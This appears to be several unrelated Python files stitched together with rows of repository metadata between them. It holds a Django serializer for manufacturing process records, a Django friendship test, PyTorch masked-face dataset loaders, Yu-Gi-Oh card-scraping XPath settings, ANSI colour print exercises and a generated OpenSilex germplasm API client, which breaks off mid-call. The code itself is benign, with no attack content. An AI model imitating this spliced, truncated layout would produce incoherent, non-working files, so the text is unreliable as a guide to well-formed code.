    state = serializers.HiddenField(default="新建")
    create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
    class Meta:
        model = SemifinishedDataDefinitionModel
        fields = ("id", "state", "type", "task_id", "semifinished_id", "station_id", "batch", "sn", "handler", "sum", "personnel", "equipment", "material", "station", "quality", "dataTime",
                  "attribute1", "attribute2", "attribute3", "attribute4", "attribute5", "attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
                  "attribute11", "attribute12", "attribute13", "attribute14", "attribute15", "attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
                  "image", "file", "desc", "create_user")
    # Whole-record validation
    def validate(self, attrs):
        if not attrs["create_user"].has_perm('production.add_semifinisheddatadefinitionmodel'):  # the current user lacks create permission
            raise serializers.ValidationError("The current user does not have create permission")
        if attrs.get('task_id'):  # a task was specified (present and non-empty)
            try:
                task = SemifinishedTaskCreateModel.objects.get(id=attrs["task_id"])  # check the task exists
            except Exception:
                raise serializers.ValidationError("The specified task does not exist")
            if task.state != "使用中":  # check the task is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified production task is not in the 'in use' state")
            attrs["taskType_code"] = task.type.code  # copy the task type code
            attrs["taskType_name"] = task.type.name  # copy the task type name
            attrs["task_code"] = task.code  # copy the task code
            attrs["task_name"] = task.name  # copy the task name
        if attrs.get('semifinished_id'):  # a semifinished product was specified (present and non-empty)
            try:
                semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"])  # check the semifinished product exists
            except Exception:
                raise serializers.ValidationError("The specified semifinished product does not exist")
            if semifinished.state != "使用中":  # check the semifinished product is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified semifinished product is not in the 'in use' state")
            attrs["semifinishedType_code"] = semifinished.type.code  # copy the semifinished type code
            attrs["semifinishedType_name"] = semifinished.type.name  # copy the semifinished type name
            attrs["semifinished_code"] = semifinished.code  # copy the semifinished code
            attrs["semifinished_name"] = semifinished.name  # copy the semifinished name
        if attrs.get('station_id'):  # a station was specified (present and non-empty)
            if not attrs.get('semifinished_id'):  # a station may only be given together with a semifinished product
                raise serializers.ValidationError("A station cannot be specified without a semifinished product")
            try:
                station = StationInforDefinitionModel.objects.get(id=attrs["station_id"])  # check the station exists
            except Exception:
                raise serializers.ValidationError("The specified station does not exist")
            if station.state != "使用中":  # check the station is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified station is not in the 'in use' state")
            attrs["stationType_code"] = station.type.code  # copy the station type code
            attrs["stationType_name"] = station.type.name  # copy the station type name
            attrs["station_code"] = station.code  # copy the station code
            attrs["station_name"] = station.name  # copy the station name
        return attrs
    # Type field validation
    def validate_type(self, value):
        try:
            data_type = SemifinishedDataTypeDefinitionModel.objects.get(id=value.id)  # check the type exists
        except SemifinishedDataTypeDefinitionModel.DoesNotExist:
            raise serializers.ValidationError("The specified type does not exist")
        if data_type.state != "使用中":  # check the type is in the '使用中' (in use) state
            raise serializers.ValidationError("The specified type is not in the 'in use' state")
        return value
class SemifinishedDataSerialize_Update(serializers.ModelSerializer):
    """
    Semifinished process data definition--update
    """
    class Meta:
        model = SemifinishedDataDefinitionModel
        fields = ("id", "type", "task_id", "semifinished_id", "station_id", "batch", "sn", "handler", "sum", "personnel", "equipment", "material", "station", "quality", "dataTime",
                  "attribute1", "attribute2", "attribute3", "attribute4", "attribute5", "attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
                  "attribute11", "attribute12", "attribute13", "attribute14", "attribute15", "attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
                  "image", "file", "desc",)
    # Whole-record validation
    def validate(self, attrs):
        if self.instance.state != '新建':  # once past the '新建' (new) state, the record can no longer be edited
            raise serializers.ValidationError("The record has already been submitted and can no longer be changed")
        if attrs.get('task_id'):  # a task was specified (present and non-empty)
            try:
                task = SemifinishedTaskCreateModel.objects.get(id=attrs["task_id"])  # check the task exists
            except Exception:
                raise serializers.ValidationError("The specified task does not exist")
            if task.state != "使用中":  # check the task is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified production task is not in the 'in use' state")
            attrs["taskType_code"] = task.type.code  # copy the task type code
            attrs["taskType_name"] = task.type.name  # copy the task type name
            attrs["task_code"] = task.code  # copy the task code
            attrs["task_name"] = task.name  # copy the task name
        if attrs.get('semifinished_id'):  # a semifinished product was specified (present and non-empty)
            try:
                semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"])  # check the semifinished product exists
            except Exception:
                raise serializers.ValidationError("The specified semifinished product does not exist")
            if semifinished.state != "使用中":  # check the semifinished product is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified semifinished product is not in the 'in use' state")
            attrs["semifinishedType_code"] = semifinished.type.code  # copy the semifinished type code
            attrs["semifinishedType_name"] = semifinished.type.name  # copy the semifinished type name
            attrs["semifinished_code"] = semifinished.code  # copy the semifinished code
            attrs["semifinished_name"] = semifinished.name  # copy the semifinished name
        if attrs.get('station_id'):  # a station was specified (present and non-empty)
            if not attrs.get('semifinished_id'):  # a station may only be given together with a semifinished product
                raise serializers.ValidationError("A station cannot be specified without a semifinished product")
            try:
                station = StationInforDefinitionModel.objects.get(id=attrs["station_id"])  # check the station exists
            except Exception:
                raise serializers.ValidationError("The specified station does not exist")
            if station.state != "使用中":  # check the station is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified station is not in the 'in use' state")
            attrs["stationType_code"] = station.type.code  # copy the station type code
            attrs["stationType_name"] = station.type.name  # copy the station type name
            attrs["station_code"] = station.code  # copy the station code
            attrs["station_name"] = station.name  # copy the station name
        return attrs
    # Type field validation
    def validate_type(self, value):
        try:
            data_type = SemifinishedDataTypeDefinitionModel.objects.get(id=value.id)  # check the type exists
        except SemifinishedDataTypeDefinitionModel.DoesNotExist:
            raise serializers.ValidationError("The specified type does not exist")
        if data_type.state != "使用中":  # check the type is in the '使用中' (in use) state
            raise serializers.ValidationError("The specified type is not in the 'in use' state")
        return value
class SemifinishedDataSerialize_List(serializers.ModelSerializer):
    """
    Semifinished process data definition--list
    """
    type = SemifinishedDataTypeDefinitionSerialize_List(required=False)
    class Meta:
        model = SemifinishedDataDefinitionModel
        fields = ("id", "state", "type",
                  "taskType_code", "taskType_name", "task_name", "task_code", "task_id", "semifinishedType_name", "semifinishedType_code", "semifinished_name", "semifinished_code", "semifinished_id",
                  "stationType_name", "stationType_code", "station_name", "station_code", "station_id", "batch", "handler", "sum", "sn",
                  "personnel", "equipment", "material", "station", "quality", "dataTime", "desc", "create_user")
class SemifinishedDataSerialize_Retrieve(serializers.ModelSerializer):
    """
    Semifinished process data definition--retrieve
    """
    image = ProductionImageSerialize_List(many=True)
    file = ProductionFileSerialize_List(many=True)
    type = SemifinishedDataTypeDefinitionSerialize_List(required=False)
    class Meta:
        model = SemifinishedDataDefinitionModel
        fields = "__all__"
class SemifinishedDataSerialize_Partial(serializers.ModelSerializer):
    """
    Semifinished process data definition--partial
    """
    class Meta:
        model = SemifinishedDataDefinitionModel
        fields = ("id", "state")
    # Whole-record validation
    def validate(self, attrs):
        if attrs['state'] == "完成":  # the record is being marked as '完成' (finished)
            conditions = {'task_id__iexact': self.instance.task_id,
                          'semifinished_id__iexact': self.instance.semifinished_id,
                          'batch__iexact': self.instance.batch,
                          'station_id__iexact': self.instance.station_id,
                          }
            try:
                station_report = SemifinishedStationReportModel.objects.get(**conditions)  # fetch the matching station work report
                station_report.sum += self.instance.sum  # accumulate the reported quantity
                station_report.save()
            except Exception:
                SemifinishedStationReportModel.objects.create(  # no matching report yet, so create one
                    taskType_code=self.instance.taskType_code,
                    taskType_name=self.instance.taskType_name,
                    task_code=self.instance.task_code,
                    task_name=self.instance.task_name,
                    task_id=self.instance.task_id,
                    semifinishedType_code=self.instance.semifinishedType_code,
                    semifinishedType_name=self.instance.semifinishedType_name,
                    semifinished_code=self.instance.semifinished_code,
                    semifinished_name=self.instance.semifinished_name,
                    semifinished_id=self.instance.semifinished_id,
                    stationType_code=self.instance.stationType_code,
                    stationType_name=self.instance.stationType_name,
                    station_code=self.instance.station_code,
                    station_name=self.instance.station_name,
                    station_id=self.instance.station_id,
                    batch=self.instance.batch,
                    sum=self.instance.sum,
                    attribute1=self.instance.attribute1,
                    attribute2=self.instance.attribute2,
                    attribute3=self.instance.attribute3,
                    attribute4=self.instance.attribute4,
                    attribute5=self.instance.attribute5,
                )
        return attrs
    # State field validation
    def validate_state(self, value):
        if self.instance.state == "新建" and value in ("完成", "作废"):
            return value
        if self.instance.state == "完成" and value == "作废":
            return value
        raise serializers.ValidationError("Cannot update the state from " + self.instance.state + " to " + value)
# endregion
class ProductStationReportSerialize_List(serializers.ModelSerializer):
    """
    Product station work report--list
    """
    class Meta:
        model = ProductStationReportModel
        fields = "__all__"
class SemifinishedStationReportSerialize_List(serializers.ModelSerializer):
    """
    Semifinished station work report--list
    """
    class Meta:
        model = SemifinishedStationReportModel
fields = "__all__" | 43.630709 | 190 | 0.618652 | 4,056 | 44,896 | 6.733974 | 0.066075 | 0.060923 | 0.118039 | 0.015817 | 0.868195 | 0.854392 | 0.842969 | 0.839856 | 0.825761 | 0.814264 | 0 | 0.005819 | 0.268844 | 44,896 | 1,029 | 191 | 43.630709 | 0.826235 | 0.060184 | 0 | 0.862516 | 0 | 0 | 0.166065 | 0.017245 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055772 | false | 0.003891 | 0.010376 | 0 | 0.264591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11e8d8e73a2f3aa38f5aebb52da3a5f93862b373 | 2,999 | py | Python | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2018-03-28T14:38:35.000Z | 2018-03-28T14:38:35.000Z | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2022-02-11T19:13:04.000Z | 2022-02-11T19:13:04.000Z | user_accounts/tests/test_friendships.py | sudo-woodo/hitmeup | 45e50b0676d986a7308ba80bf623daa8a588767d | [
"MIT"
] | 1 | 2018-02-14T06:36:43.000Z | 2018-02-14T06:36:43.000Z | from django.test.testcases import TestCase
from user_accounts.models import Friendship
from util.factories import UserProfileFactory
class FriendshipTestCase(TestCase):
NUM_OTHERS = 5
def setUp(self):
self.profile = UserProfileFactory()
self.other = UserProfileFactory()
def test_add(self):
# Normal add
friendship, created = self.profile.add_friend(self.other)
self.assertFalse(friendship.accepted)
self.assertTrue(created)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 1)
self.assertEqual(len(self.other.friends), 0)
self.assertEqual(len(self.other.pending_incoming_friends), 1)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Repeat add
friendship, created = self.profile.add_friend(self.other)
self.assertFalse(friendship.accepted)
self.assertFalse(created)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 1)
self.assertEqual(len(self.other.friends), 0)
self.assertEqual(len(self.other.pending_incoming_friends), 1)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Normal accept
friendship, created = self.other.add_friend(self.profile)
self.assertTrue(friendship.accepted)
self.assertTrue(created)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 0)
self.assertEqual(len(self.other.friends), 1)
self.assertEqual(len(self.other.pending_incoming_friends), 0)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Repeat accept
friendship, created = self.other.add_friend(self.profile)
self.assertTrue(friendship.accepted)
self.assertFalse(created)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 0)
self.assertEqual(len(self.other.friends), 1)
self.assertEqual(len(self.other.pending_incoming_friends), 0)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
def test_del(self):
# Add friendship
self.profile.add_friend(self.other)
self.other.add_friend(self.profile)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.other.friends), 1)
# Delete friendship
self.profile.del_friend(self.other)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.other.friends), 0)
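    # Illustrative note (not part of the original file; the dotted path is
    # inferred from this module's location): the cases run under Django's
    # test runner, e.g.
    #
    #     python manage.py test user_accounts.tests.test_friendships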
| 38.948052 | 71 | 0.7009 | 358 | 2,999 | 5.751397 | 0.117318 | 0.203983 | 0.244779 | 0.299174 | 0.843128 | 0.843128 | 0.843128 | 0.813987 | 0.802331 | 0.802331 | 0 | 0.011944 | 0.190397 | 2,999 | 76 | 72 | 39.460526 | 0.836079 | 0.027342 | 0 | 0.754717 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.679245 | 1 | 0.056604 | false | 0 | 0.056604 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e12b6b2b802d37f61cc26ca422529560e1a71075 | 8,097 | py | Python | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | 1 | 2021-05-21T07:56:26.000Z | 2021-05-21T07:56:26.000Z | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | null | null | null | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | 1 | 2021-08-10T05:34:53.000Z | 2021-08-10T05:34:53.000Z | import os
import numpy as np
import torch
import pandas as pd
import glob
import torchvision.transforms as T
from pathlib import Path
from torch.utils.data import Dataset
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
class RMFDMaskToMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_masked_face_dataset/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2m.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-mask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDMaskToNonMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.mask_root = os.path.join(
self.path, 'AFDB_masked_face_dataset/')
self.nonmask_root = os.path.join(
self.path, 'AFDB_face_dataset/')
mask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_mask.csv"))
mask_inference_list['path'] = self.mask_root + mask_inference_list['path'].astype(str)
nonmask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_nonmask.csv"))
nonmask_inference_list['path'] = self.nonmask_root + nonmask_inference_list['path'].astype(str)
self.inference_list = pd.concat((mask_inference_list,
nonmask_inference_list))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
img_path = self.inference_list[i]
img = self.transform(Image.open(img_path).convert("RGB"))
label = os.path.join(*Path(img_path).parts[-2:])
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDNonMask2NonMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_face_dataset/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_nm2nm.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "nonmask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
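# Illustrative usage sketch (not part of the original file; the folder path
# and batch size are assumptions): each dataset yields (image_tensor, label)
# pairs and exposes self.pairs_file with the verification pairs to score:
#
#     from torch.utils.data import DataLoader
#     ds = RMFDMaskToNonMask("/path/to/RMFD")
#     loader = DataLoader(ds, batch_size=64, num_workers=4)
#     for imgs, labels in loader:
#         pass  # embed imgs, then compare embeddings along ds.pairs_file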
class RMFDMaskToMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_masked_face_dataset_aligned/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2m.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-mask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDMaskToNonMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.mask_root = os.path.join(
self.path, 'AFDB_masked_face_dataset_aligned/')
self.nonmask_root = os.path.join(
self.path, 'AFDB_face_dataset_aligned/')
mask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_mask.csv"))
mask_inference_list['path'] = self.mask_root + mask_inference_list['path'].astype(str)
nonmask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_nonmask.csv"))
nonmask_inference_list['path'] = self.nonmask_root + nonmask_inference_list['path'].astype(str)
self.inference_list = pd.concat((mask_inference_list,
nonmask_inference_list))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
img_path = self.inference_list[i]
img = self.transform(Image.open(img_path).convert("RGB"))
label = os.path.join(*Path(img_path).parts[-2:])
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDNonMask2NonMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_face_dataset_aligned/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_nm2nm.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "nonmask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list) | 34.900862 | 103 | 0.581203 | 1,019 | 8,097 | 4.363101 | 0.081452 | 0.157895 | 0.11471 | 0.081871 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0 | 0.021075 | 0.296777 | 8,097 | 232 | 104 | 34.900862 | 0.759747 | 0 | 0 | 0.909091 | 0 | 0 | 0.075821 | 0.065201 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102273 | false | 0 | 0.051136 | 0.034091 | 0.255682 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
015477b8eb894614e2e6ade4791017fe5c52a806 | 1,663 | py | Python | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | monster_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'attribute': '//*[@id="details"]/tr[1]/td[1]/div/span[@class="item_box_value"]/text()',
'level_rank': '//*[@id="details"]/tr[1]/td[2]/div/span[@class="item_box_value"]/text()',
'monster_type': '//*[@id="details"]/tr[2]/td/div/text()',
'monster_card_type': '//*[@id="details"]/tr[3]/td/div/text()',
'attack': '//*[@id="details"]/tr[4]/td[1]/div/span[@class="item_box_value"]/text()',
'defence': '//*[@id="details"]/tr[4]/td[2]/div/span[@class="item_box_value"]/text()',
'card_description': '//*[@id="details"]/tr[5]/td/div/node()[not(self::div)]',
}
pendulum_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'attribute': '//*[@id="details"]/tr[1]/td[1]/div/span[@class="item_box_value"]/text()',
'level_rank': '//*[@id="details"]/tr[1]/td[2]/div/span[@class="item_box_value"]/text()',
'pendulum_scale': '//*[@id="details"]/tr[2]/td/div/text()',
'pendulum_effect': '//*[@id="details"]/tr[3]/td/div/text()',
'monster_type': '//*[@id="details"]/tr[4]/td/div/text()',
'monster_card_type': '//*[@id="details"]/tr[5]/td/div/text()',
'attack': '//*[@id="details"]/tr[6]/td[1]/div/span[@class="item_box_value"]/text()',
'defence': '//*[@id="details"]/tr[6]/td[2]/div/span[@class="item_box_value"]/text()',
'card_description': '//*[@id="details"]/tr[5]/td/div/node()[not(self::div)]',
}
magic_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'card_description': '//*[@id="details"]/tr[2]/td/div/node()[not(self::div)]',
'card_type': '//*[@id="details"]/tr[1]/td/div/text()',
}
| 51.96875 | 92 | 0.570054 | 245 | 1,663 | 3.710204 | 0.155102 | 0.178218 | 0.217822 | 0.140814 | 0.940594 | 0.910891 | 0.822882 | 0.705171 | 0.705171 | 0.587459 | 0 | 0.019066 | 0.085388 | 1,663 | 31 | 93 | 53.645161 | 0.578567 | 0 | 0 | 0.333333 | 0 | 0.407407 | 0.796152 | 0.66386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0180f35dedf2f2dd64e3bcf9c7c7e433db3ebeda | 243 | py | Python | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | print('\033[31;43mOla, mundo!\033[m')
# ANSI escape sequences: '\033[<style>;<fg>;<bg>m' switches colours and
# '\033[m' resets them; "Ola, mundo!" is Portuguese for "Hello, world!".
print('\033[1;32;40mOla, mundo!\033[m')  # bold green text on a black background
print('\033[2;33;41mOla, mundo!\033[m')  # dim yellow text on a red background
print('\033[3;34;42mOla, mundo!\033[m')  # italic blue text on a green background
print('\033[4;35;43mOla, mundo!\033[m')  # underlined magenta text on a yellow background
print('\033[7;36;44mOla, mundo!\033[m')  # inverted cyan text on a blue background
| 20.25 | 39 | 0.63786 | 47 | 243 | 3.297872 | 0.425532 | 0.309677 | 0.348387 | 0.451613 | 0.625806 | 0.296774 | 0 | 0 | 0 | 0 | 0 | 0.287611 | 0.069959 | 243 | 11 | 40 | 22.090909 | 0.39823 | 0 | 0 | 0 | 0 | 0 | 0.747899 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
6d9d0d05876f1722b332cb4e4e5afc85b46b436d | 45,558 | py | Python | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | null | null | null | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | 7 | 2021-05-25T14:06:04.000Z | 2021-11-05T15:42:14.000Z | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
OpenSilex API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: INSTANCE-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opensilexClientToolsPython.api_client import ApiClient
class GermplasmApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_germplasm(self, **kwargs): # noqa: E501
"""Add a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmCreationDTO body: Germplasm description
:param bool check_only: Checking only
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def create_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Add a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmCreationDTO body: Germplasm description
:param bool check_only: Checking only
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'check_only', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'check_only' in params:
query_params.append(('checkOnly', params['check_only'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
